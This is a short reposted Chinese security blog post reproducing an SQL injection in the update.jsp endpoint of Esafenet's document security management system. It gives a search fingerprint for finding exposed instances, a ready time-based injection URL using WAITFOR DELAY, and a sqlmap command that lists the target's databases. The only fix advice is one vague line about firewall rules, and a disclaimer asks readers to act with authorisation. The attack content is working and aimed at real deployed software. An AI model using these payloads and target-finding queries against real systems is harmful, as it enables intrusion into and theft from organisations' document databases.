亿赛通电子文档安全管理系统 Update.jsp SQL注入

admin 2023年10月17日13:28:52评论52 views字数 634阅读2分6秒阅读模式

本文由掌控安全学院 - 会唱会跳会敲键盘 投稿

0x01 漏洞介绍
亿赛通电子文档安全管理系统是国内最早基于文件过滤驱动技术的文档加解密产品之一,保护范围涵盖终端电脑(Windows、Mac、Linux系统平台)、智能终端(Android、IOS)及各类应用系统(OA、知识管理、文档管理、项目管理、PDM等)。该漏洞存在与/update接口下,flag对输入的数据没有进行严格的过滤而导致SQL注入,攻击者可以利用该漏洞获取数据库敏感信息。
0x02 影响产品


  1. 亿赛通电子文档安全管理系统

0x03 语法特征


  1. app="亿赛通-电子文档安全管理系统"

0x04 漏洞复现
页面亿赛通电子文档安全管理系统 Update.jsp SQL注入

POC


  1. CDGServer3/workflowE/useractivate/update.jsp?flag=1&ids=1,3);WAITFOR%20DELAY%20%270:0:值%27--

修改值的大小 对应延迟时间亿赛通电子文档安全管理系统 Update.jsp SQL注入
亿赛通电子文档安全管理系统 Update.jsp SQL注入


  1. python3 sqlmap.py -u "https://xxxxx/CDGServer3/workflowE/useractiv
  2. ate/update.jsp?flag=1&ids=1,3)" --batch --dbs

亿赛通电子文档安全管理系统 Update.jsp SQL注入

0x05 漏洞修复建议

设置防火墙规则,过滤漏洞相关的敏感链接监测

申明:本公众号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,

所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法.

亿赛通电子文档安全管理系统 Update.jsp SQL注入

原文始发于微信公众号(掌控安全EDU):亿赛通电子文档安全管理系统 Update.jsp SQL注入

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年10月17日13:28:52
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   亿赛通电子文档安全管理系统 Update.jsp SQL注入http://cn-sec.com/archives/2120821.html

发表评论

匿名网友 填写信息